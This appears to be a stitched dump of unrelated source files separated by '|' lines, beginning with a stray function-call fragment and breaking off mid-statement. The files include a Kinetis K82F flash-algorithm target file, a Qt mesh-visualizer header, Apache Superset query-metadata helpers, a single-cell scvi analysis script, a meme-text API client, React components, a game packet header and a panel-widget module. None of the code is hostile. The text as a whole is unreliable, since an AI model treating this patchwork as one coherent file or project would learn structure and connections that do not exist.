sample_delete_detection_config(detection_config.id)
|
"""
Flash OS Routines (Automagically Generated)
Copyright (c) 2009-2015 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from .family.target_kinetis import Kinetis
from .family.flash_kinetis import Flash_Kinetis
from ..core.memory_map import (FlashRegion, RamRegion, RomRegion, MemoryMap)
from ..debug.svd import SVDFile
import logging
flash_algo = {
'load_address' : 0x20000000,
'instructions' : [
0xE00ABE00, 0x062D780D, 0x24084068, 0xD3000040, 0x1E644058, 0x1C49D1FA, 0x2A001E52, 0x4770D1F2,
0xb510483e, 0x5120f24c, 0xf64d81c1, 0x81c11128, 0xf0218801, 0x80010101, 0x78414839, 0x0160f001,
0xbf0c2940, 0x21002101, 0x444a4a36, 0xb1397011, 0xf0217841, 0x70410160, 0xf0117841, 0xd1fb0f60,
0x44484831, 0xf864f000, 0xbf182800, 0xbd102001, 0x4448482c, 0xb1587800, 0x78414829, 0x0160f021,
0x0140f041, 0x78417041, 0x0160f001, 0xd1fa2940, 0x47702000, 0xb5104824, 0x44484924, 0xf897f000,
0xbf182800, 0x2100bd10, 0xe8bd481f, 0x44484010, 0xb95df000, 0x4c1cb570, 0x444c4605, 0x4b1b4601,
0x68e24620, 0xf8bbf000, 0xbf182800, 0x2300bd70, 0x68e24629, 0x4070e8bd, 0x44484813, 0xb951f000,
0x460cb570, 0x4606460b, 0x480f4601, 0x4615b084, 0xf0004448, 0x2800f8f0, 0xb004bf1c, 0x2000bd70,
0xe9cd2101, 0x90021000, 0x462b4807, 0x46314622, 0xf0004448, 0xb004f984, 0x0000bd70, 0x40052000,
0x4007e000, 0x00000004, 0x00000008, 0x6b65666b, 0xbf042800, 0x47702004, 0x6cc949ec, 0x6103f3c1,
0xbf08290f, 0x2180f44f, 0x4ae9bf1f, 0xf832447a, 0x02891011, 0xe9c02200, 0x21012100, 0x03096081,
0x49e460c1, 0x3f28f811, 0x7c80f44f, 0xf303fa0c, 0x78c96143, 0x62026102, 0x61816242, 0x47704610,
0xbf0e2800, 0x61012004, 0x47702000, 0x48da4602, 0x49d96840, 0x0070f440, 0x47706048, 0x217048d5,
0x21807001, 0x78017001, 0x0f80f011, 0x7800d0fb, 0x0f20f010, 0x2067bf1c, 0xf0104770, 0xbf1c0f10,
0x47702068, 0x0001f010, 0x2069bf18, 0x28004770, 0x2004bf04, 0xb5104770, 0x4ac64604, 0x403bf06f,
0x48c66050, 0xbf144281, 0x2000206b, 0xbf182800, 0x4620bd10, 0xffd2f7ff, 0x46204603, 0xffc6f7ff,
0xbd104618, 0xbf042800, 0x47702004, 0x60532300, 0x60d36093, 0x61536113, 0x61d36193, 0x68c16011,
0xe9d06051, 0xfbb11001, 0x6090f0f0, 0x21102004, 0x0103e9c2, 0x1005e9c2, 0x200061d0, 0xe92d4770,
0xb0884df0, 0x46984615, 0x4682460c, 0xf7ff466a, 0x462affd9, 0x46504621, 0xf0009b04, 0x0007f931,
0xb008bf1c, 0x8df0e8bd, 0x4600e9dd, 0x1e451960, 0xf0f6fbb5, 0x5010fb06, 0xfbb5b120, 0x1c40f0f6,
0x1e454370, 0xbf9842ac, 0xb268f8df, 0xf024d81c, 0xf040407f, 0xf8cb6010, 0x48980004, 0xbf144580,
0x2000206b, 0xbf1c2800, 0xe8bdb008, 0x46508df0, 0xff74f7ff, 0xf8da4607, 0x28000010, 0x4780bf18,
0x4434b917, 0xd9e242ac, 0xf7ff4650, 0xb008ff5f, 0xe8bd4638, 0x2a008df0, 0x2004bf04, 0xe92d4770,
0xb08945f0, 0x461e4614, 0x4680460d, 0xf7ff466a, 0x4632ff89, 0x46404629, 0xf0009b03, 0x0007f8e1,
0xb009bf1c, 0x85f0e8bd, 0x2e009d00, 0xf8dfbf18, 0xd025a1e4, 0x0b04f854, 0x0008f8ca, 0x28049803,
0xf025bf04, 0xf040407f, 0xd00960c0, 0xd1092808, 0x0b04f854, 0x000cf8ca, 0x407ff025, 0x60e0f040,
0x0004f8ca, 0xf7ff4640, 0xf8d8ff29, 0x46071010, 0xbf182900, 0xb91f4788, 0x44059803, 0xd1d91a36,
0xf7ff4640, 0xb009ff13, 0xe8bd4638, 0x280085f0, 0x2004bf04, 0x4a624770, 0x4101ea42, 0x60514a5d,
0xe92de70c, 0xb0884dff, 0x469a4614, 0x466a460d, 0xf7ff9808, 0x4622ff37, 0x9b054629, 0xf0009808,
0x2800f88f, 0xb00cbf1c, 0x8df0e8bd, 0x4629466a, 0xf7ff9808, 0x9e00ff27, 0x8008f8dd, 0xf1c84270,
0x40080100, 0x42b74247, 0x4447bf08, 0xbf182c00, 0xb120f8df, 0x1bbdd01f, 0xbf8842a5, 0x98054625,
0x417ff026, 0xf0f0fbb5, 0x7180f041, 0x1004f8cb, 0xea400400, 0xf040200a, 0xf8cb00ff, 0x98080008,
0xfeccf7ff, 0xbf1c2800, 0xe8bdb00c, 0x1b648df0, 0x4447442e, 0xb00cd1df, 0xe8bd2000, 0x2b008df0,
0x2004bf04, 0xe92d4770, 0xb0884dff, 0xe9dd4616, 0x461d7a14, 0x466a460c, 0x8058f8dd, 0xf7ff9808,
0xe9ddfee1, 0x46323007, 0xf0004621, 0x2800f839, 0xb00cbf1c, 0x8df0e8bd, 0x2e009c00, 0xb00cbf04,
0x8df0e8bd, 0xb08cf8df, 0x407ff06f, 0x6707ea40, 0x407ff024, 0x7000f040, 0x0004f8cb, 0x7008f8cb,
0xf8cb6828, 0x9808000c, 0xfe88f7ff, 0xf1bab168, 0xbf180f00, 0x4000f8ca, 0x0f00f1b8, 0x2100bf1c,
0x1000f8c8, 0xe8bdb00c, 0x99078df0, 0xf0211a76, 0x440d0103, 0x440c9907, 0xb00cd1da, 0x8df0e8bd,
0xbf042800, 0x47702004, 0x42191e5b, 0x421abf0e, 0x47702065, 0x428b6803, 0x6840d806, 0x44184411,
0xbf244288, 0x47702000, 0x47702066, 0x40048000, 0x000003bc, 0x40020000, 0x4001f000, 0x6b65666b,
0x4000ffff, 0x40020004, 0x40020010, 0x00100008, 0x00200018, 0x00400030, 0x00800060, 0x010000c0,
0x02000180, 0x04000300, 0x00000600, 0x00000000, 0x00000000,
],
'pc_init' : 0x20000021,
'pc_unInit': 0x20000071,
'pc_program_page': 0x200000E1,
'pc_erase_sector': 0x200000B5,
'pc_eraseAll' : 0x20000095,
'static_base' : 0x20000000 + 0x00000020 + 0x0000050c,
'begin_stack' : 0x20000000 + 0x00000800,
'begin_data' : 0x20000000 + 0x00000A00,
'page_size' : 0x00000200,
'analyzer_supported' : True,
'analyzer_address' : 0x1ffff000, # Analyzer 0x1ffff000..0x1ffff600
'page_buffers' : [0x20003000, 0x20004000], # Enable double buffering
'min_program_length' : 8,
};
class Flash_k82f25615(Flash_Kinetis):
def __init__(self, target):
super(Flash_k82f25615, self).__init__(target, flash_algo)
class K82F25615(Kinetis):
memoryMap = MemoryMap(
FlashRegion( start=0, length=0x40000, blocksize=0x1000, isBootMemory=True),
RamRegion( start=0x1fff0000, length=0x40000)
)
def __init__(self, transport):
super(K82F25615, self).__init__(transport, self.memoryMap)
self.mdm_idr = 0x001c0000
self._svd_location = SVDFile(vendor="Freescale", filename="MK82F25615.svd")
|
#ifndef FACESHAPEFROMSHADING_OFFSCREENMESHVISUALIZER_H
#define FACESHAPEFROMSHADING_OFFSCREENMESHVISUALIZER_H
//#include "Geometry/geometryutils.hpp"
//#include "Utils/utility.hpp"
#include "basicmesh.h"
#include "parameters.h"
#include <QDir>
#include <QImage>
#include <QOpenGLContext>
#include <QOpenGLFramebufferObject>
#include <QOffscreenSurface>
#include <boost/timer/timer.hpp>
#include "nlohmann/json.hpp"
using json = nlohmann::json;
namespace ColorEncoding {
inline void encode_index(int idx, unsigned char& r, unsigned char& g, unsigned char& b) {
r = static_cast<unsigned char>(idx & 0xff); idx >>= 8;
g = static_cast<unsigned char>(idx & 0xff); idx >>= 8;
b = static_cast<unsigned char>(idx & 0xff);
}
inline int decode_index(unsigned char r, unsigned char g, unsigned char b, int& idx) {
idx = b; idx <<= 8; idx |= g; idx <<= 8; idx |= r;
return idx;
}
}
class OffscreenMeshVisualizer {
public:
enum MVPMode {
OrthoNormal,
OrthoNormalExtended,
CamPerspective,
BackgroundImage
};
enum RenderMode {
Texture,
BarycentricCoordinates,
Normal,
Mesh,
MeshAndImage,
TexturedMesh
};
OffscreenMeshVisualizer(int width, int height)
: width(width), height(height), index_encoded(true), lighting_enabled(false) {
// Load rendering settings
{
const string home_directory = QDir::homePath().toStdString();
cout << "Home dir: " << home_directory << endl;
ifstream fin(home_directory + "/Data/Settings/blendshape_vis_ao.json");
fin >> rendering_settings;
}
}
void LoadRenderingSettings(const string& filename) {
ifstream fin(filename);
fin >> rendering_settings;
}
void BindMesh(const BasicMesh& in_mesh) {
mesh = in_mesh;
}
void BindTexture(const QImage& in_texture) {
texture = in_texture;
}
void BindImage(const QImage& img) {
image = img;
}
void SetMeshRotationTranslation(const Vector3d& R, const Vector3d& T) {
mesh_rotation = R;
mesh_translation = T;
}
void SetCameraParameters(const CameraParameters& cam_params) {
camera_params = cam_params;
}
void SetFacesToRender(const vector<int>& indices) {
faces_to_render = indices;
}
void SetNormals(const vector<float>& ns) {
normals = ns;
}
void SetAmbientOcclusion(const vector<float>& ao_in) {
ao = ao_in;
}
void SetRenderMode(RenderMode mode_in) {
render_mode = mode_in;
}
void SetMVPMode(MVPMode mode_in) {
mode = mode_in;
}
void SetIndexEncoded(bool val) {
index_encoded = val;
}
void SetEnableLighting(bool val) {
lighting_enabled = val;
}
QImage Render(bool multi_sampled=false) const;
pair<QImage, vector<float>> RenderWithDepth(bool multi_sampled=false) const;
protected:
void SetupViewing(const MVPMode&) const;
void CreateTexture() const;
void EnableLighting() const;
void DisableLighting() const;
private:
int width, height;
MVPMode mode;
RenderMode render_mode;
Vector3d mesh_rotation, mesh_translation;
CameraParameters camera_params;
mutable vector<int> faces_to_render;
mutable vector<float> normals;
mutable vector<float> ao;
bool index_encoded;
bool lighting_enabled;
BasicMesh mesh;
QImage image;
mutable GLuint image_tex;
QImage texture;
mutable glm::dmat4 Mview;
json rendering_settings;
mutable vector<GLuint> enabled_lights;
};
#endif //FACESHAPEFROMSHADING_OFFSCREENMESHVISUALIZER_H
|
'use strict';
describe("ajaxQueue", function() {
it("test", function() {
expect(true).toBe(true);
});
});
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from contextlib import closing
from typing import Any, Callable, Dict, List, Optional, Set, TYPE_CHECKING
import sqlparse
from flask_babel import lazy_gettext as _
from sqlalchemy import and_, or_
from sqlalchemy.exc import NoSuchTableError
from sqlalchemy.orm import Session
from sqlalchemy.sql.type_api import TypeEngine
from superset.columns.models import Column as NewColumn
from superset.errors import ErrorLevel, SupersetError, SupersetErrorType
from superset.exceptions import (
SupersetGenericDBErrorException,
SupersetSecurityException,
)
from superset.models.core import Database
from superset.result_set import SupersetResultSet
from superset.sql_parse import has_table_query, insert_rls, ParsedQuery, Table
from superset.superset_typing import ResultSetColumnType
from superset.tables.models import Table as NewTable
if TYPE_CHECKING:
from superset.connectors.sqla.models import SqlaTable
def get_physical_table_metadata(
database: Database,
table_name: str,
schema_name: Optional[str] = None,
) -> List[Dict[str, Any]]:
"""Use SQLAlchemy inspector to get table metadata"""
db_engine_spec = database.db_engine_spec
db_dialect = database.get_dialect()
# ensure empty schema
_schema_name = schema_name if schema_name else None
# Table does not exist or is not visible to a connection.
if not (
database.has_table_by_name(table_name=table_name, schema=_schema_name)
or database.has_view_by_name(view_name=table_name, schema=_schema_name)
):
raise NoSuchTableError
cols = database.get_columns(table_name, schema=_schema_name)
for col in cols:
try:
if isinstance(col["type"], TypeEngine):
db_type = db_engine_spec.column_datatype_to_string(
col["type"], db_dialect
)
type_spec = db_engine_spec.get_column_spec(
db_type, db_extra=database.get_extra()
)
col.update(
{
"type": db_type,
"type_generic": type_spec.generic_type if type_spec else None,
"is_dttm": type_spec.is_dttm if type_spec else None,
}
)
# Broad exception catch, because there are multiple possible exceptions
# from different drivers that fall outside CompileError
except Exception: # pylint: disable=broad-except
col.update(
{
"type": "UNKNOWN",
"type_generic": None,
"is_dttm": None,
}
)
return cols
def get_virtual_table_metadata(dataset: "SqlaTable") -> List[ResultSetColumnType]:
"""Use SQLparser to get virtual dataset metadata"""
if not dataset.sql:
raise SupersetGenericDBErrorException(
message=_("Virtual dataset query cannot be empty"),
)
db_engine_spec = dataset.database.db_engine_spec
engine = dataset.database.get_sqla_engine(schema=dataset.schema)
sql = dataset.get_template_processor().process_template(
dataset.sql, **dataset.template_params_dict
)
parsed_query = ParsedQuery(sql)
if not db_engine_spec.is_readonly_query(parsed_query):
raise SupersetSecurityException(
SupersetError(
error_type=SupersetErrorType.DATASOURCE_SECURITY_ACCESS_ERROR,
message=_("Only `SELECT` statements are allowed"),
level=ErrorLevel.ERROR,
)
)
statements = parsed_query.get_statements()
if len(statements) > 1:
raise SupersetSecurityException(
SupersetError(
error_type=SupersetErrorType.DATASOURCE_SECURITY_ACCESS_ERROR,
message=_("Only single queries supported"),
level=ErrorLevel.ERROR,
)
)
# TODO(villebro): refactor to use same code that's used by
# sql_lab.py:execute_sql_statements
try:
with closing(engine.raw_connection()) as conn:
cursor = conn.cursor()
query = dataset.database.apply_limit_to_sql(statements[0])
db_engine_spec.execute(cursor, query)
result = db_engine_spec.fetch_data(cursor, limit=1)
result_set = SupersetResultSet(result, cursor.description, db_engine_spec)
cols = result_set.columns
except Exception as ex:
raise SupersetGenericDBErrorException(message=str(ex)) from ex
return cols
def validate_adhoc_subquery(
sql: str,
database_id: int,
default_schema: str,
) -> str:
"""
Check if adhoc SQL contains sub-queries or nested sub-queries with table.
If sub-queries are allowed, the adhoc SQL is modified to insert any applicable RLS
predicates to it.
:param sql: adhoc sql expression
:raise SupersetSecurityException if sql contains sub-queries or
nested sub-queries with table
"""
# pylint: disable=import-outside-toplevel
from superset import is_feature_enabled
statements = []
for statement in sqlparse.parse(sql):
if has_table_query(statement):
if not is_feature_enabled("ALLOW_ADHOC_SUBQUERY"):
raise SupersetSecurityException(
SupersetError(
error_type=SupersetErrorType.ADHOC_SUBQUERY_NOT_ALLOWED_ERROR,
message=_("Custom SQL fields cannot contain sub-queries."),
level=ErrorLevel.ERROR,
)
)
statement = insert_rls(statement, database_id, default_schema)
statements.append(statement)
return ";\n".join(str(statement) for statement in statements)
def load_or_create_tables( # pylint: disable=too-many-arguments
session: Session,
database: Database,
default_schema: Optional[str],
tables: Set[Table],
conditional_quote: Callable[[str], str],
) -> List[NewTable]:
"""
Load or create new table model instances.
"""
if not tables:
return []
# set the default schema in tables that don't have it
if default_schema:
fixed_tables = list(tables)
for i, table in enumerate(fixed_tables):
if table.schema is None:
fixed_tables[i] = Table(table.table, default_schema, table.catalog)
tables = set(fixed_tables)
# load existing tables
predicate = or_(
*[
and_(
NewTable.database_id == database.id,
NewTable.schema == table.schema,
NewTable.name == table.table,
)
for table in tables
]
)
new_tables = session.query(NewTable).filter(predicate).all()
# add missing tables
existing = {(table.schema, table.name) for table in new_tables}
for table in tables:
if (table.schema, table.table) not in existing:
try:
column_metadata = get_physical_table_metadata(
database=database,
table_name=table.table,
schema_name=table.schema,
)
except Exception: # pylint: disable=broad-except
continue
columns = [
NewColumn(
name=column["name"],
type=str(column["type"]),
expression=conditional_quote(column["name"]),
is_temporal=column["is_dttm"],
is_aggregation=False,
is_physical=True,
is_spatial=False,
is_partition=False,
is_increase_desired=True,
)
for column in column_metadata
]
new_tables.append(
NewTable(
name=table.table,
schema=table.schema,
catalog=None,
database_id=database.id,
columns=columns,
)
)
existing.add((table.schema, table.table))
return new_tables
|
import os
import scanpy as sc
from ._plotting import pair_plot, plot_z_3d, keys_to_colors, plot_x_traj
import numpy as np
from ._mymodel import MyModel
from . import setup_anndata
import scvi
def save_results_txt(
model_path, latent, cell_type, start_idx, end_idx, time_course, init_indices
):
np.savetxt(os.path.join(model_path, "latent.txt"), latent)
np.savetxt(os.path.join(model_path, "cell_type.txt"), cell_type, fmt="%s")
np.savetxt(os.path.join(model_path, "start_idx.txt"), start_idx, fmt="%d")
np.savetxt(os.path.join(model_path, "end_idx.txt"), end_idx, fmt="%d")
np.savetxt(os.path.join(model_path, "time_course.txt"), time_course)
np.savetxt(os.path.join(model_path, "init_indices.txt"), init_indices, fmt="%d")
# print useful command
out_path = "../../dem/case_studies/"
cmd = "cp -r " + model_path + " " + out_path
print("useful command:\n", cmd)
def init_model_name(idx, m_type, n_latent, n_hidden, min_counts, n_top_genes):
model_dir = "models" # hardcoded
if not os.path.exists(model_dir):
os.mkdir(model_dir)
model_name = (
m_type
+ str(idx)
+ "_D"
+ str(n_latent)
+ "_G"
+ str(n_top_genes)
+ "_H"
+ str(n_hidden)
+ "_MC"
+ str(min_counts)
)
return model_name
def parse_args(data_dir, idx, model_name, pretrained):
# Command line arguments
idx = int(idx)
pretrained = True if (int(pretrained) > 0) else False
print("idx =", idx)
print("pretrained =", pretrained)
print(" ")
# Read data and get final model name
all_names = sorted(os.listdir(data_dir))
for j, name in enumerate(all_names):
print(j + 1, ":", name)
fn = all_names[idx - 1]
data_name = fn.split(".")[0]
model_name = model_name + "-" + data_name
adata = sc.read_h5ad(os.path.join(data_dir, fn))
print("\nMODEL_NAME: >>>>>>>>>>", model_name, "<<<<<<<<<<<")
return model_name, adata, pretrained
def analysis(
data_dir, idx, pretrained, linear, n_latent, n_hidden, min_counts, n_top_genes,
decode_traj = False):
# Setup
m_type = "lin" if linear else "nl"
model_name = init_model_name(
idx, m_type, n_latent, n_hidden, min_counts, n_top_genes
)
model_name, adata, pretrained = parse_args(data_dir, idx, model_name, pretrained)
# Get names of start and end cell(s), and pseudotime
cell_ids = adata.obs["cell_id"]
cell_type = adata.obs["cell_type"]
start_idx = np.where(np.isin(cell_ids, adata.uns["start_id"]))[0]
end_idx = np.where(np.isin(cell_ids, adata.uns["end_id"]))[0]
time_course = np.array(adata.obs["timecourse"])
print("start cell(s):", start_idx)
print("end cell(s):", end_idx)
# Get indices of all start cells
init_type = np.array(cell_type[start_idx])[0]
print("init_type: ", init_type)
init_indices = np.where(np.array(cell_type) == init_type)[0]
print("found", len(init_indices), "cells of type", init_type)
# Set output file names
pairs_fn = "pairs-" + model_name + ".png"
umap1_fn = "-celltype-" + model_name + ".png"
umap2_fn = "-timecourse-" + model_name + ".png"
# Filter genes
sc.pp.filter_genes(adata, min_counts=min_counts)
# Normalize (store also raw)
adata.layers["counts"] = adata.X.copy() # preserve counts
sc.pp.normalize_total(adata, target_sum=1e4)
sc.pp.log1p(adata)
adata.raw = adata # freeze the state in `.raw`
# Select highly variable genes
sc.pp.highly_variable_genes(
adata, n_top_genes=n_top_genes, subset=True, layer="counts", flavor="seurat_v3"
)
# Setup adata and model directory
setup_anndata(adata, layer="counts", labels_key="cell_type")
model_path = os.path.join("models", model_name)
print(adata)
if not pretrained:
# Create and train model
model = scvi.model.LinearSCVI(adata, n_latent=n_latent, n_hidden=n_hidden)
model.train()
model.save(model_path)
else:
# Load pretrained model
model = scvi.model.LinearSCVI.load(model_path, adata)
print("Loaded model from:", model_path)
if decode_traj:
z_traj = np.load(os.path.join(model_path, "z_traj.npy"))
decode_trajectories(model, adata, z_traj)
return None
# Get latent and plot
latent = model.get_latent_representation()
cell_colors = keys_to_colors(cell_type)
pair_plot(
latent, cell_colors, save_name=pairs_fn, start_idx=start_idx, end_idx=end_idx
)
if n_latent == 3:
plot_z_3d(latent, cell_colors)
# Rec error
rerr = model.get_reconstruction_error()
print("Reconstruction error = ", rerr)
adata.obsm["X_scVI"] = latent
# use scVI latent space for UMAP generation
sc.pp.neighbors(adata, use_rep="X_scVI")
sc.tl.umap(adata, min_dist=0.2)
sc.pl.umap(adata, color=["cell_type"], frameon=False, save=umap1_fn, show=False)
sc.pl.umap(adata, color=["timecourse"], frameon=False, save=umap2_fn, show=False)
# save latent representation as txt
save_results_txt(
model_path, latent, cell_type, start_idx, end_idx, time_course, init_indices
)
return adata, model
def decode_trajectories(model, adata, z_traj):
print("Using VAE decoder to decode trajectories!")
W = model.get_loadings().to_numpy().T
print("W:", W.shape)
print("z_traj:", z_traj.shape)
N_traj = z_traj.shape[1]
G = W.shape[1]
L = z_traj.shape[0]
X_traj = np.zeros((N_traj, L, G))
for idx in range(N_traj):
z_idx = z_traj[:, idx, :]
x_traj = np.matmul(z_idx, W)
X_traj[idx, :, :] = x_traj
print("X_traj:", X_traj.shape)
np.random.seed(123)
gene_inds = np.random.choice(G, size=5, replace=False)
print("gene_inds:", gene_inds)
plot_x_traj(X_traj, gene_inds)
|
import json
import random
import requests
import os
from nltk import word_tokenize, pos_tag, download
from confessionscommenter.general_utils import HiddenPrints
#Download necessary tokenizers
download("punkt", quiet=True)
download("averaged_perceptron_tagger", quiet=True)
with HiddenPrints():
from transformers import pipeline
generator = pipeline('text-generation', model='gpt2')
class SHAREAPI:
def __init__(self):
self.root_link = "https://07oyvkdcgg.execute-api.us-west-1.amazonaws.com/Prod"
def get_generatable_memes_info(self):
with open(os.path.join(os.path.dirname(__file__), "meme_data.json")) as f: #TODO: Maybe make an API call here?
res = json.load(f)
return res
def get_initial_word_from_text(self, text, method="long_words"): #TODO: Maybe make an API call here?
if method == "long_words":
words = text.split(" ")
important_words = [word for word in words if len(word) > 4]
if len(important_words) > 0:
return random.choice(important_words)
else:
return ""
elif method == "ntlk_verbs":
# From https://stackoverflow.com/questions/5404243/extracting-english-verbs-from-a-given-text/5410074
tokens = word_tokenize(text)
pos_tagged_tokens = pos_tag(tokens)
verbs = [word[0] for word in pos_tagged_tokens if word[1].startswith('V')]
if len(verbs) > 0:
return random.choice(verbs)
else:
return ""
else:
return ""
def predict_meme_text(self, template_id, num_boxes, init_text = "", beam_width=1, max_output_length=140):
params = {
'api_method': 'predict_meme', #REQUIRED
'template_id': template_id,
'num_boxes': num_boxes,
'init_text': init_text,
'beam_width': beam_width,
'max_output_length': max_output_length
}
response = requests.get(f"{self.root_link}/predict", params=params).json()
# print("Response from api call", response)
if 'outputs' in response:
return response['outputs']
return 'Error'
# return response['outputs']
def generate_gpt2_comments(self, msg, num=1):
with HiddenPrints():
global generator
q = msg[(msg.index(" ")+1):]
prompt = f"{q}\n RESPONSE: "
text = generator(prompt, max_length=len(prompt.split(" "))+100, num_return_sequences=num)
return [text[i]['generated_text'][len(prompt):] for i in range(num)]
# def _generate_gpt2_comments(self, prompt, max_length, num_return_sequences):
# """STIL NOT READY. DO NOT USE YET"""
# params = {
# 'api_method': 'predict_gpt2', #REQUIRED
# 'prompt': prompt,
# 'max_length': max_length,
# 'num_return_sequences': num_return_sequences,
# }
# response = requests.get(f"{self.root_link}/predict", params=params).json() #TODO: Handle when the api call times out
# print(response)
# return response['outputs']
if __name__ == '__main__':
x = SHAREAPI()
print(x.predict_meme_text(3218037, 2))
|
import React from 'react';
import {
Text, View, TouchableOpacity, Image, StyleSheet
} from 'react-native';
import PropTypes from 'prop-types';
import I18n from '../../../i18n';
import sharedStyles from '../../Styles';
import { COLOR_PRIMARY } from '../../../constants/colors';
const styles = StyleSheet.create({
container: {
flex: 1,
alignItems: 'center',
justifyContent: 'center'
},
button: {
flexDirection: 'row'
},
title: {
fontSize: 14,
...sharedStyles.textColorTitle,
...sharedStyles.textRegular
},
server: {
fontSize: 12,
color: COLOR_PRIMARY,
...sharedStyles.textRegular
},
disclosure: {
marginLeft: 3,
marginTop: 1,
width: 12,
height: 9
},
upsideDown: {
transform: [{ scaleY: -1 }],
marginTop: 4
}
});
const HeaderTitle = React.memo(({ connecting, isFetching }) => {
let title = I18n.t('Messages');
if (connecting) {
title = I18n.t('Connecting');
}
if (isFetching) {
title = I18n.t('Updating');
}
return <Text style={styles.title}>{title}</Text>;
});
const Header = React.memo(({
connecting, isFetching, serverName, showServerDropdown, onPress
}) => (
<View style={styles.container}>
<TouchableOpacity
onPress={onPress}
testID='rooms-list-header-server-dropdown-button'
style={styles.container}
disabled={connecting || isFetching}
>
<HeaderTitle connecting={connecting} isFetching={isFetching} />
<View style={styles.button}>
<Text style={styles.server}>{serverName}</Text>
<Image style={[styles.disclosure, showServerDropdown && styles.upsideDown]} source={{ uri: 'disclosure_indicator_server' }} />
</View>
</TouchableOpacity>
</View>
));
Header.propTypes = {
connecting: PropTypes.bool,
isFetching: PropTypes.bool,
serverName: PropTypes.string,
showServerDropdown: PropTypes.bool.isRequired,
onPress: PropTypes.func.isRequired
};
Header.defaultProps = {
serverName: 'Rocket.Chat'
};
HeaderTitle.propTypes = {
connecting: PropTypes.bool,
isFetching: PropTypes.bool
};
export default Header;
|
// @flow
import * as React from 'react';
import { StaticRouter } from 'react-router';
import Landing from './landing.react';
export type LandingSSRProps = {
+url: string,
+basename: string,
};
function LandingSSR(props: LandingSSRProps): React.Node {
const { url, basename } = props;
const routerContext = React.useMemo(() => ({}), []);
return (
<StaticRouter location={url} basename={basename} context={routerContext}>
<Landing />
</StaticRouter>
);
}
export default LandingSSR;
|
#ifndef _CG_TEAMLEADERRETINVITE_H_
#define _CG_TEAMLEADERRETINVITE_H_
#include "Type.h"
#include "Packet.h"
#include "PacketFactory.h"
namespace Packets
{
class CGTeamLeaderRetInvite: public Packet
{
public:
CGTeamLeaderRetInvite(){};
virtual ~CGTeamLeaderRetInvite(){};
//公用接口
virtual BOOL Read( SocketInputStream& iStream ) ;
virtual BOOL Write( SocketOutputStream& oStream )const ;
virtual UINT Execute( Player* pPlayer ) ;
virtual PacketID_t GetPacketID()const { return PACKET_CG_TEAMLEADERRETINVITE ; }
virtual UINT GetPacketSize()const { return sizeof(BYTE)+
sizeof(GUID_t)*2; }
public :
VOID SetReturn( BOOL bRet ){ m_Return = (BYTE)bRet ; }
BOOL GetReturn( ){ return (BOOL)m_Return ; }
VOID SetSourGUID( GUID_t guid ){ m_SourGUID = guid ; }
GUID_t GetSourGUID( ){ return m_SourGUID ; }
VOID SetDestGUID( GUID_t guid ){ m_DestGUID = guid ; }
GUID_t GetDestGUID( ){ return m_DestGUID ; }
public :
BYTE m_Return ;
GUID_t m_SourGUID ; //邀请人
GUID_t m_DestGUID ; //被邀请人
};
class CGTeamLeaderRetInviteFactory: public PacketFactory
{
public:
Packet* CreatePacket() { return new CGTeamLeaderRetInvite() ; }
PacketID_t GetPacketID()const { return PACKET_CG_TEAMLEADERRETINVITE ; }
UINT GetPacketMaxSize()const { return sizeof(BYTE)+
sizeof(GUID_t)*2; }
};
class CGTeamLeaderRetInviteHandler
{
public:
static UINT Execute(CGTeamLeaderRetInvite* pPacket,Player* pPlayer);
};
}
using namespace Packets;
#endif
|
#!/usr/bin/env python3
from gi.repository import GLib
import subprocess
import threading
from nwg_panel.tools import check_key, update_image
import gi
gi.require_version('Gtk', '3.0')
gi.require_version('Gdk', '3.0')
from gi.repository import Gtk, Gdk, GdkPixbuf
class Executor(Gtk.EventBox):
def __init__(self, settings, icons_path):
self.settings = settings
self.icons_path = icons_path
Gtk.EventBox.__init__(self)
self.box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=0)
self.add(self.box)
self.image = Gtk.Image()
self.label = Gtk.Label("")
self.icon_path = None
check_key(settings, "script", "")
check_key(settings, "interval", 0)
check_key(settings, "root-css-name", "root-executor")
check_key(settings, "css-name", "")
check_key(settings, "icon-placement", "left")
check_key(settings, "icon-size", 16)
check_key(settings, "tooltip-text", "")
check_key(settings, "on-left-click", "")
check_key(settings, "on-right-click", "")
check_key(settings, "on-middle-click", "")
check_key(settings, "on-scroll-up", "")
check_key(settings, "on-scroll-down", "")
update_image(self.image, "view-refresh-symbolic", self.settings["icon-size"], self.icons_path)
self.set_property("name", settings["root-css-name"])
# reverting #57, as check_key only adds keys if MISSING, not if empty
if settings["css-name"]:
self.label.set_property("name", settings["css-name"])
else:
self.label.set_property("name", "executor-label")
if settings["tooltip-text"]:
self.set_tooltip_text(settings["tooltip-text"])
if settings["on-left-click"] or settings["on-right-click"] or settings["on-middle-click"] or settings[
"on-scroll-up"] or settings["on-scroll-down"]:
self.connect('button-press-event', self.on_button_press)
self.add_events(Gdk.EventMask.SCROLL_MASK)
self.connect('scroll-event', self.on_scroll)
self.connect('enter-notify-event', self.on_enter_notify_event)
self.connect('leave-notify-event', self.on_leave_notify_event)
self.build_box()
self.refresh()
if settings["interval"] > 0:
Gdk.threads_add_timeout_seconds(GLib.PRIORITY_LOW, settings["interval"], self.refresh)
def update_widget(self, output):
if output:
if len(output) == 1:
if output[0].endswith(".svg") or output[0].endswith(".png"):
new_path = output[0].strip()
if new_path != self.icon_path:
if "/" not in new_path and "." not in new_path: # name given instead of path
update_image(self.image, new_path, self.settings["icon-size"], self.icons_path)
self.icon_path = new_path
else:
try:
pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_size(
new_path, self.settings["icon-size"], self.settings["icon-size"])
self.image.set_from_pixbuf(pixbuf)
self.icon_path = new_path
except:
